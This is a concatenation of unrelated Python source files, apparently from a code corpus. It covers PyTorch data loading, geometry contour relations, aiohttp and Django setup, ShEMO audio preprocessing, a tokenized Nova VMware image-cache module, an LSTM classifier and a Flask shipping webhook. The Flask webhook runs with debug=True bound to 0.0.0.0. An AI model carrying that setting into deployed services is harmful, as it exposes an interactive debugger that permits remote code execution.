"""Return the static method <modify_commandline_options> of the dataset class."""
dataset_class = find_dataset_using_name(dataset_name)
return dataset_class.modify_commandline_options
def create_dataset(opt):
"""Create a dataset given the option.
This function wraps the class CustomDatasetDataLoader.
This is the main interface between this package and 'train.py'/'test.py'
Example:
>>> from data import create_dataset
>>> dataset = create_dataset(opt)
"""
data_loader = CustomDatasetDataLoader(opt)
dataset = data_loader.load_data()
return dataset
class CustomDatasetDataLoader():
"""Wrapper class of Dataset class that performs multi-threaded data loading"""
def __init__(self, opt):
"""Initialize this class
Step 1: create a dataset instance given the name [dataset_mode]
Step 2: create a multi-threaded data loader.
"""
self.opt = opt
dataset_class = find_dataset_using_name(opt.dataset_mode)
self.dataset = dataset_class(opt)
print("dataset [%s] was created" % type(self.dataset).__name__)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batch_size,
shuffle=not opt.serial_batches,
num_workers=int(opt.num_threads),
drop_last=True if opt.isTrain else False,
)
self.i = None
def set_epoch(self, epoch):
self.dataset.current_epoch = epoch
def load_data(self):
return self
def __len__(self):
"""Return the number of data in the dataset"""
return min(len(self.dataset), self.opt.max_dataset_size)
def __iter__(self):
"""Return a batch of data"""
#for i, data in enumerate(self.dataloader):
# if i * self.opt.batch_size >= self.opt.max_dataset_size:
# break
# yield data
self.i = 0
return iter(self.dataloader)
def __next__(self):
if self.i * self.opt.batch_size >= self.opt.max_dataset_size:
raise StopIteration()
item = next(self.dataloader)
self.i += 1
return item
|
py | 1a4fc076b14469c32812bb5e5730a41d354f7a78 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Application bootstraping."""
from __future__ import absolute_import, print_function
import warnings
import click
from flask import current_app
from flask.cli import with_appcontext
from pkg_resources import iter_entry_points, resource_filename, working_set
@click.group()
def instance():
"""Instance commands."""
# Even more
# top-level
# block comments
def main():
pass
|
py | 1a4fc11acd3501cd6965d4fe00c8499f51fc61a5 | from itertools import chain
from typing import Iterable
from ground.base import (Context,
Location,
Orientation,
Relation)
from ground.hints import (Contour,
Multisegment,
Point,
Segment)
from . import box
from .events_queue import (CompoundEventsQueue,
LinearEventsQueue)
from .hints import SegmentEndpoints
from .multisegment import to_segments_endpoints
from .processing import (process_closed_linear_queue,
process_open_linear_queue)
from .segment import (locate_point as locate_point_to_segment,
relate_segment as relate_segments)
def locate_point(contour: Contour, point: Point, context: Context) -> Location:
return (Location.EXTERIOR
if all(locate_point_to_segment(segment, point, context)
is Location.EXTERIOR
for segment in context.contour_segments(contour))
else Location.BOUNDARY)
def relate_segment(contour: Contour,
segment: Segment,
context: Context) -> Relation:
angle_orientation = context.angle_orientation
has_no_touch = has_no_cross = True
last_touched_edge_index = last_touched_edge_start = None
start, end = segment.start, segment.end
for index, sub_segment in enumerate(context.contour_segments(contour)):
sub_segment_start, sub_segment_end = sub_segment_endpoints = (
sub_segment.start, sub_segment.end)
relation = relate_segments(sub_segment, segment, context)
if relation is Relation.COMPONENT or relation is Relation.EQUAL:
return Relation.COMPONENT
elif relation is Relation.OVERLAP or relation is Relation.COMPOSITE:
return Relation.OVERLAP
elif relation is Relation.TOUCH:
if has_no_touch:
has_no_touch = False
elif (has_no_cross
and index - last_touched_edge_index == 1
and start not in sub_segment_endpoints
and end not in sub_segment_endpoints
and (angle_orientation(start, end, sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start,
last_touched_edge_start,
sub_segment_start,
sub_segment_end,
context)):
has_no_cross = False
last_touched_edge_index = index
last_touched_edge_start = sub_segment_start
elif has_no_cross and relation is Relation.CROSS:
has_no_cross = False
vertices = contour.vertices
if (has_no_cross
and not has_no_touch
and last_touched_edge_index == len(vertices) - 1):
first_sub_segment_endpoints = (first_sub_segment_start,
first_sub_segment_end) = (vertices[-1],
vertices[0])
if (relate_segments(context.segment_cls(first_sub_segment_start,
first_sub_segment_end),
segment,
context) is Relation.TOUCH
and start not in first_sub_segment_endpoints
and end not in first_sub_segment_endpoints
and (angle_orientation(start, end, first_sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start, vertices[-2],
first_sub_segment_start,
first_sub_segment_end,
context)):
has_no_cross = False
return ((Relation.DISJOINT if has_no_touch else Relation.TOUCH)
if has_no_cross
else Relation.CROSS)
def point_vertex_line_divides_angle(point: Point,
first_ray_point: Point,
vertex: Point,
second_ray_point: Point,
context: Context) -> bool:
return (context.angle_orientation(vertex, first_ray_point, point)
is context.angle_orientation(vertex, point, second_ray_point))
def relate_multisegment(contour: Contour,
multisegment: Multisegment,
context: Context) -> Relation:
contour_bounding_box = context.contour_box(contour)
multisegment_bounding_box = context.segments_box(multisegment.segments)
if box.disjoint_with(contour_bounding_box, multisegment_bounding_box):
return Relation.DISJOINT
events_queue = LinearEventsQueue(context)
events_queue.register(to_edges_endpoints(contour),
from_test=False)
events_queue.register(to_segments_endpoints(multisegment),
from_test=True)
return process_open_linear_queue(events_queue,
min(contour_bounding_box.max_x,
multisegment_bounding_box.max_x))
def relate_contour(goal: Contour, test: Contour, context: Context) -> Relation:
goal_bounding_box, test_bounding_box = (context.contour_box(goal),
context.contour_box(test))
if box.disjoint_with(goal_bounding_box, test_bounding_box):
return Relation.DISJOINT
if equal(goal, test, context):
return Relation.EQUAL
events_queue = CompoundEventsQueue(context)
events_queue.register(to_oriented_edges_endpoints(goal, context),
from_test=False)
events_queue.register(to_oriented_edges_endpoints(test, context),
from_test=True)
return process_closed_linear_queue(events_queue,
min(goal_bounding_box.max_x,
test_bounding_box.max_x))
def equal(left: Contour, right: Contour, context: Context) -> bool:
left_vertices, right_vertices = left.vertices, right.vertices
if len(left_vertices) != len(right_vertices):
return False
try:
index = right_vertices.index(left_vertices[0])
except ValueError:
return False
same_oriented = orientation(left, context) is orientation(right, context)
right_step = 1 if same_oriented else -1
size = len(left_vertices)
indices = chain(zip(range(size),
range(index, size)
if same_oriented
else range(index, -1, right_step)),
zip(range(size - index if same_oriented else index + 1,
size),
range(index)
if same_oriented
else range(size - 1, index - 1, right_step)))
return all(left_vertices[left_index] == right_vertices[right_index]
for left_index, right_index in indices)
def orientation(contour: Contour, context: Context) -> Orientation:
vertices = contour.vertices
index = min(range(len(vertices)),
key=vertices.__getitem__)
return context.angle_orientation(vertices[index - 1], vertices[index],
vertices[(index + 1) % len(vertices)])
def to_edges_endpoints(contour: Contour) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return ((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
def to_oriented_edges_endpoints(contour: Contour,
context: Context,
clockwise: bool = False
) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return (((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
if (orientation(contour, context)
is (Orientation.CLOCKWISE
if clockwise
else Orientation.COUNTERCLOCKWISE))
else ((vertices[index], vertices[index - 1])
for index in range(len(vertices) - 1, -1, -1)))
|
py | 1a4fc15e51fdbe5576aca5977a0310f9d4281e12 |
from aiohttp import web
from tt_web import log
from tt_web import postgresql
async def on_startup(app):
await postgresql.initialize(app['config']['database'])
async def on_cleanup(app):
await postgresql.deinitialize()
def register_routers(app):
from . import handlers
app.router.add_post('/apply', handlers.apply)
app.router.add_post('/get-items', handlers.get_items)
app.router.add_post('/has-items', handlers.has_items)
app.router.add_post('/get-item-logs', handlers.get_item_logs)
app.router.add_post('/debug-clear-service', handlers.debug_clear_service)
def create_application(config):
app = web.Application()
app['config'] = config
log.initilize(config['log'])
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)
register_routers(app)
return app
|
py | 1a4fc1bd602debb1bd5b2e3b180f5ead26d6bb13 | """
.. module:: django_core_utils.apps
:synopsis: django_core_utils app configuration module.
django_core_utils app configuration module.
"""
from django.apps import AppConfig
class CoreUtilsConfig(AppConfig):
"""CoreUtils application configuration class.
"""
name = 'django_core_utils'
|
py | 1a4fc2afbfcda0b35dfc94bd174b57d40165ff31 | """Process the raw ShEMO dataset.
This assumes the file structure from the original compressed file:
/.../
male/
*.wav
female/
...
"""
from pathlib import Path
import click
from ertk.dataset import resample_audio, write_annotations, write_filelist
from ertk.utils import PathlibPath
emotion_map = {
"A": "anger",
"H": "happiness",
"N": "neutral",
"S": "sadness",
"W": "surprise",
"F": "fear",
}
unused_emotions = ["F"]
@click.command()
@click.argument("input_dir", type=PathlibPath(exists=True, file_okay=False))
@click.option("--resample/--noresample", default=True)
def main(input_dir: Path, resample: bool):
"""Process the ShEMO dataset at location INPUT_DIR and resample
audio to 16 kHz 16-bit WAV audio.
"""
paths = list(input_dir.glob("*/*.wav"))
if resample:
resample_dir = Path("resampled")
resample_audio(paths, resample_dir)
write_filelist(resample_dir.glob("*.wav"), "files_all")
write_filelist(
[p for p in resample_dir.glob("*.wav") if p.stem[3] not in unused_emotions],
"files_5class",
)
write_annotations({p.stem: emotion_map[p.stem[3]] for p in paths}, "label")
speaker_dict = {p.stem: p.stem[:3] for p in paths}
write_annotations(speaker_dict, "speaker")
write_annotations({k: v[0] for k, v in speaker_dict.items()}, "gender")
write_annotations({p.stem: "ar" for p in paths}, "language")
if __name__ == "__main__":
main()
|
py | 1a4fc2bf8c379463eda2689cfcbf9796c8b5da94 | begin_unit
comment|'# Copyright (c) 2014 VMware, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
string|'"""\nImage cache class\n\nImages that are stored in the cache folder will be stored in a folder whose\nname is the image ID. In the event that an image is discovered to be no longer\nused then a timestamp will be added to the image folder.\nThe timestamp will be a folder - this is due to the fact that we can use the\nVMware API\'s for creating and deleting of folders (it really simplifies\nthings). The timestamp will contain the time, on the compute node, when the\nimage was first seen to be unused.\nAt each aging iteration we check if the image can be aged.\nThis is done by comparing the current nova compute time to the time embedded\nin the timestamp. If the time exceeds the configured aging time then\nthe parent folder, that is the image ID folder, will be deleted.\nThat effectively ages the cached image.\nIf an image is used then the timestamps will be deleted.\n\nWhen accessing a timestamp we make use of locking. This ensure that aging\nwill not delete an image during the spawn operation. When spawning\nthe timestamp folder will be locked and the timestamps will be purged.\nThis will ensure that an image is not deleted during the spawn.\n"""'
newline|'\n'
nl|'\n'
name|'from'
name|'oslo_concurrency'
name|'import'
name|'lockutils'
newline|'\n'
name|'from'
name|'oslo_config'
name|'import'
name|'cfg'
newline|'\n'
name|'from'
name|'oslo_log'
name|'import'
name|'log'
name|'as'
name|'logging'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'timeutils'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
name|'as'
name|'vutil'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'i18n'
name|'import'
name|'_LI'
op|','
name|'_LW'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
name|'import'
name|'imagecache'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'ds_util'
newline|'\n'
nl|'\n'
DECL|variable|LOG
name|'LOG'
op|'='
name|'logging'
op|'.'
name|'getLogger'
op|'('
name|'__name__'
op|')'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'cfg'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|TIMESTAMP_PREFIX
name|'TIMESTAMP_PREFIX'
op|'='
string|"'ts-'"
newline|'\n'
DECL|variable|TIMESTAMP_FORMAT
name|'TIMESTAMP_FORMAT'
op|'='
string|"'%Y-%m-%d-%H-%M-%S'"
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ImageCacheManager
name|'class'
name|'ImageCacheManager'
op|'('
name|'imagecache'
op|'.'
name|'ImageCacheManager'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
name|'session'
op|','
name|'base_folder'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ImageCacheManager'
op|','
name|'self'
op|')'
op|'.'
name|'__init__'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_session'
op|'='
name|'session'
newline|'\n'
name|'self'
op|'.'
name|'_base_folder'
op|'='
name|'base_folder'
newline|'\n'
name|'self'
op|'.'
name|'_ds_browser'
op|'='
op|'{'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|_folder_delete
dedent|''
name|'def'
name|'_folder_delete'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'dc_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'file_delete'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_path'
op|','
name|'dc_ref'
op|')'
newline|'\n'
dedent|''
name|'except'
op|'('
name|'vexc'
op|'.'
name|'CannotDeleteFileException'
op|','
nl|'\n'
name|'vexc'
op|'.'
name|'FileFaultException'
op|','
nl|'\n'
name|'vexc'
op|'.'
name|'FileLockedException'
op|')'
name|'as'
name|'e'
op|':'
newline|'\n'
comment|'# There may be more than one process or thread that tries'
nl|'\n'
comment|'# to delete the file.'
nl|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warning'
op|'('
name|'_LW'
op|'('
string|'"Unable to delete %(file)s. Exception: %(ex)s"'
op|')'
op|','
nl|'\n'
op|'{'
string|"'file'"
op|':'
name|'ds_path'
op|','
string|"'ex'"
op|':'
name|'e'
op|'}'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'vexc'
op|'.'
name|'FileNotFoundException'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"File not found: %s"'
op|','
name|'ds_path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|enlist_image
dedent|''
dedent|''
name|'def'
name|'enlist_image'
op|'('
name|'self'
op|','
name|'image_id'
op|','
name|'datastore'
op|','
name|'dc_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'cache_root_folder'
op|'='
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|')'
newline|'\n'
nl|'\n'
comment|'# Check if the timestamp file exists - if so then delete it. This'
nl|'\n'
comment|'# will ensure that the aging will not delete a cache image if it'
nl|'\n'
comment|'# is going to be used now.'
nl|'\n'
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'cache_root_folder'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
comment|'# Lock to ensure that the spawn will not try and access an image'
nl|'\n'
comment|'# that is currently being deleted on the datastore.'
nl|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'timestamp_cleanup'
op|'('
name|'dc_ref'
op|','
name|'ds_browser'
op|','
name|'path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|timestamp_folder_get
dedent|''
dedent|''
name|'def'
name|'timestamp_folder_get'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns the timestamp folder."""'
newline|'\n'
name|'return'
name|'ds_path'
op|'.'
name|'join'
op|'('
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|timestamp_cleanup
dedent|''
name|'def'
name|'timestamp_cleanup'
op|'('
name|'self'
op|','
name|'dc_ref'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'self'
op|'.'
name|'_get_timestamp'
op|'('
name|'ds_browser'
op|','
name|'ds_path'
op|')'
newline|'\n'
name|'if'
name|'ts'
op|':'
newline|'\n'
indent|' '
name|'ts_path'
op|'='
name|'ds_path'
op|'.'
name|'join'
op|'('
name|'ts'
op|')'
newline|'\n'
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"Timestamp path %s exists. Deleting!"'
op|','
name|'ts_path'
op|')'
newline|'\n'
comment|'# Image is used - no longer need timestamp folder'
nl|'\n'
name|'self'
op|'.'
name|'_folder_delete'
op|'('
name|'ts_path'
op|','
name|'dc_ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_timestamp
dedent|''
dedent|''
name|'def'
name|'_get_timestamp'
op|'('
name|'self'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
name|'files'
op|'='
name|'ds_util'
op|'.'
name|'get_sub_folders'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_browser'
op|','
name|'ds_path'
op|')'
newline|'\n'
name|'if'
name|'files'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'file'
name|'in'
name|'files'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'file'
op|'.'
name|'startswith'
op|'('
name|'TIMESTAMP_PREFIX'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'file'
newline|'\n'
nl|'\n'
DECL|member|_get_timestamp_filename
dedent|''
dedent|''
dedent|''
dedent|''
name|'def'
name|'_get_timestamp_filename'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'%s%s'"
op|'%'
op|'('
name|'TIMESTAMP_PREFIX'
op|','
nl|'\n'
name|'timeutils'
op|'.'
name|'utcnow'
op|'('
op|')'
op|'.'
name|'strftime'
op|'('
name|'TIMESTAMP_FORMAT'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_datetime_from_filename
dedent|''
name|'def'
name|'_get_datetime_from_filename'
op|'('
name|'self'
op|','
name|'timestamp_filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'timestamp_filename'
op|'.'
name|'lstrip'
op|'('
name|'TIMESTAMP_PREFIX'
op|')'
newline|'\n'
name|'return'
name|'timeutils'
op|'.'
name|'parse_strtime'
op|'('
name|'ts'
op|','
name|'fmt'
op|'='
name|'TIMESTAMP_FORMAT'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_ds_browser
dedent|''
name|'def'
name|'_get_ds_browser'
op|'('
name|'self'
op|','
name|'ds_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_ds_browser'
op|'.'
name|'get'
op|'('
name|'ds_ref'
op|'.'
name|'value'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'ds_browser'
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'vutil'
op|'.'
name|'get_object_property'
op|'('
name|'self'
op|'.'
name|'_session'
op|'.'
name|'vim'
op|','
nl|'\n'
name|'ds_ref'
op|','
nl|'\n'
string|'"browser"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_ds_browser'
op|'['
name|'ds_ref'
op|'.'
name|'value'
op|']'
op|'='
name|'ds_browser'
newline|'\n'
dedent|''
name|'return'
name|'ds_browser'
newline|'\n'
nl|'\n'
DECL|member|_list_datastore_images
dedent|''
name|'def'
name|'_list_datastore_images'
op|'('
name|'self'
op|','
name|'ds_path'
op|','
name|'datastore'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return a list of the images present in _base.\n\n This method returns a dictionary with the following keys:\n - unexplained_images\n - originals\n """'
newline|'\n'
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'originals'
op|'='
name|'ds_util'
op|'.'
name|'get_sub_folders'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ds_browser'
op|','
nl|'\n'
name|'ds_path'
op|')'
newline|'\n'
name|'return'
op|'{'
string|"'unexplained_images'"
op|':'
op|'['
op|']'
op|','
nl|'\n'
string|"'originals'"
op|':'
name|'originals'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|_age_cached_images
dedent|''
name|'def'
name|'_age_cached_images'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'datastore'
op|','
name|'dc_info'
op|','
nl|'\n'
name|'ds_path'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Ages cached images."""'
newline|'\n'
name|'age_seconds'
op|'='
name|'CONF'
op|'.'
name|'remove_unused_original_minimum_age_seconds'
newline|'\n'
name|'unused_images'
op|'='
name|'self'
op|'.'
name|'originals'
op|'-'
name|'self'
op|'.'
name|'used_images'
newline|'\n'
name|'ds_browser'
op|'='
name|'self'
op|'.'
name|'_get_ds_browser'
op|'('
name|'datastore'
op|'.'
name|'ref'
op|')'
newline|'\n'
name|'for'
name|'image'
name|'in'
name|'unused_images'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'ds_path'
op|','
name|'image'
op|')'
newline|'\n'
comment|'# Lock to ensure that the spawn will not try and access an image'
nl|'\n'
comment|'# that is currently being deleted on the datastore.'
nl|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ts'
op|'='
name|'self'
op|'.'
name|'_get_timestamp'
op|'('
name|'ds_browser'
op|','
name|'path'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'ts'
op|':'
newline|'\n'
indent|' '
name|'ts_path'
op|'='
name|'path'
op|'.'
name|'join'
op|'('
name|'self'
op|'.'
name|'_get_timestamp_filename'
op|'('
op|')'
op|')'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'mkdir'
op|'('
name|'self'
op|'.'
name|'_session'
op|','
name|'ts_path'
op|','
name|'dc_info'
op|'.'
name|'ref'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'vexc'
op|'.'
name|'FileAlreadyExistsException'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'debug'
op|'('
string|'"Timestamp already exists."'
op|')'
newline|'\n'
dedent|''
name|'LOG'
op|'.'
name|'info'
op|'('
name|'_LI'
op|'('
string|'"Image %s is no longer used by this node. "'
nl|'\n'
string|'"Pending deletion!"'
op|')'
op|','
name|'image'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'dt'
op|'='
name|'self'
op|'.'
name|'_get_datetime_from_filename'
op|'('
name|'str'
op|'('
name|'ts'
op|')'
op|')'
newline|'\n'
name|'if'
name|'timeutils'
op|'.'
name|'is_older_than'
op|'('
name|'dt'
op|','
name|'age_seconds'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'info'
op|'('
name|'_LI'
op|'('
string|'"Image %s is no longer used. "'
nl|'\n'
string|'"Deleting!"'
op|')'
op|','
name|'path'
op|')'
newline|'\n'
comment|'# Image has aged - delete the image ID folder'
nl|'\n'
name|'self'
op|'.'
name|'_folder_delete'
op|'('
name|'path'
op|','
name|'dc_info'
op|'.'
name|'ref'
op|')'
newline|'\n'
nl|'\n'
comment|'# If the image is used and the timestamp file exists then we delete'
nl|'\n'
comment|'# the timestamp.'
nl|'\n'
dedent|''
dedent|''
dedent|''
dedent|''
name|'for'
name|'image'
name|'in'
name|'self'
op|'.'
name|'used_images'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
name|'self'
op|'.'
name|'timestamp_folder_get'
op|'('
name|'ds_path'
op|','
name|'image'
op|')'
newline|'\n'
name|'with'
name|'lockutils'
op|'.'
name|'lock'
op|'('
name|'str'
op|'('
name|'path'
op|')'
op|','
name|'lock_file_prefix'
op|'='
string|"'nova-vmware-ts'"
op|','
nl|'\n'
name|'external'
op|'='
name|'True'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'timestamp_cleanup'
op|'('
name|'dc_info'
op|'.'
name|'ref'
op|','
name|'ds_browser'
op|','
nl|'\n'
name|'path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|update
dedent|''
dedent|''
dedent|''
name|'def'
name|'update'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instances'
op|','
name|'datastores_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""The cache manager entry point.\n\n This will invoke the cache manager. This will update the cache\n according to the defined cache management scheme. The information\n populated in the cached stats will be used for the cache management.\n """'
newline|'\n'
comment|'# read running instances data'
nl|'\n'
name|'running'
op|'='
name|'self'
op|'.'
name|'_list_running_instances'
op|'('
name|'context'
op|','
name|'instances'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'used_images'
op|'='
name|'set'
op|'('
name|'running'
op|'['
string|"'used_images'"
op|']'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
newline|'\n'
comment|'# perform the aging and image verification per datastore'
nl|'\n'
name|'for'
op|'('
name|'datastore'
op|','
name|'dc_info'
op|')'
name|'in'
name|'datastores_info'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|')'
newline|'\n'
name|'images'
op|'='
name|'self'
op|'.'
name|'_list_datastore_images'
op|'('
name|'ds_path'
op|','
name|'datastore'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'originals'
op|'='
name|'images'
op|'['
string|"'originals'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'_age_cached_images'
op|'('
name|'context'
op|','
name|'datastore'
op|','
name|'dc_info'
op|','
name|'ds_path'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_image_cache_folder
dedent|''
dedent|''
name|'def'
name|'get_image_cache_folder'
op|'('
name|'self'
op|','
name|'datastore'
op|','
name|'image_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns datastore path of folder containing the image."""'
newline|'\n'
name|'return'
name|'datastore'
op|'.'
name|'build_path'
op|'('
name|'self'
op|'.'
name|'_base_folder'
op|','
name|'image_id'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
|
py | 1a4fc312cb76fd2946a5e55dc0fd56a0ebc212e6 | import torch.nn as nn
import torch
from modules.lstm_encoder import LSTMEncoder
from modules.self_attention import SelfAttention
from modules.binary_decoder import BinaryDecoder
class BinaryLSTMClassifier(nn.Module):
def __init__(self, emb_dim, hidden_dim, vocab_size, num_label, attention_mode, args):
super(BinaryLSTMClassifier, self).__init__()
self.num_label = num_label
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.args = args
# Encoder
self.encoder = LSTMEncoder(emb_dim, hidden_dim, vocab_size, encoder_dropout=args.encoder_dropout)
if self.encoder.bidirectional:
hidden_dim = hidden_dim * 2
# Init Attention
if attention_mode == 'self':
self.att = SelfAttention
elif attention_mode == 'None':
self.att = None
if self.att is not None:
self.attention_layer = self.att(hidden_dim)
# Decoder
self.decoder = BinaryDecoder(hidden_dim, num_label)
def load_encoder_embedding(self, emb, fix_emb=False):
self.encoder.embeddings.weight = nn.Parameter(torch.FloatTensor(emb))
if fix_emb:
self.encoder.embeddings.weight.requires_grad = False
def forward(self, x, seq_len, elmo):
out, hidden = self.encoder(x, seq_len, elmo)
if self.att is not None:
out, alpha = self.attention_layer(out, seq_len.view(-1))
else:
seq_len_expand = seq_len.view(-1, 1, 1).expand(out.size(0), 1, out.size(2)) - 1
out = torch.gather(out, 1, seq_len_expand).squeeze(1)
pred = self.decoder(out)
return pred
|
py | 1a4fc37ba73c43ff592621f33c1baabd73e5a2c4 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"data": {},
"contextOut": [],
"source": "apiai-onlinestore-shipping"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=True, port=port, host='0.0.0.0')
|
